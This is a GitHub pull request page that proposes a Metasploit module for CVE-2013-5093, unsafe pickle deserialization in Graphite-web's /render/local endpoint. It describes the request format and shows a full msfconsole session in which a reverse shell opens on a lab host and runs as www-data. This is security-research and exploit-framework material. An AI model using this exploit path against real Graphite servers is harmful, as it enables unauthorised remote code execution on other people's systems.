Adding module for CVE 2013-5093, Graphite Web Exploit #2260

Closed
wants to merge 1 commit into
from

4 participants

@CharlieEriksen

Application

Graphite web: http://graphite.wikidot.com/

Versions affected: 0.9.5 up till and including 0.9.10

Installation guide: https://gist.github.com/jgeurts/3112065

Analysis

The vulnerability was introduced in: graphite-project/graphite-web@71d395e

Note that in webapp/web/render/views.py, which is a publicly accessible URL by default(I have found no way of restricting access), a pickle can be loaded. Pickles are unsafe as they can contain commands that will be executed.

The routing for the exploit goes as following, as defined in webapp/web/render/views.py:

/render/local

The request to trigger it has to formatted like:

[Chart type]

[Pickle]

Chart type, as an example, can be "line". This is then followed by a linebreak and then the pickle.

Usage

msf > use exploit/unix/webapp/graphite_pickle_exec 
msf exploit(graphite_pickle_exec) > show options

Module options (exploit/unix/webapp/graphite_pickle_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The path to a vulnerable application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(graphite_pickle_exec) > set RHOST 192.168.80.149
RHOST => 192.168.80.149
msf exploit(graphite_pickle_exec) > check
[*] The target appears to be vulnerable.
msf exploit(graphite_pickle_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 39Dm9uxcphKQ5GwX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "39Dm9uxcphKQ5GwX\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.80.129:4444 -> 192.168.80.149:57141) at 2013-08-07 19:14:59 -0400

whoami
www-data
@jvazquez-r7

Processing...

@brandonprry

This is a really good example of this type of vulnerability! Thanks!

@jvazquez-r7

Just asking the author to repeat pr from a different branch than his master, as pointed on rapid7 wiki

https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment#wiki-pull

@coveralls

Coverage Status

Changes Unknown when pulling 3053233 on CharlieEriksen:master into ** on rapid7:master**.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment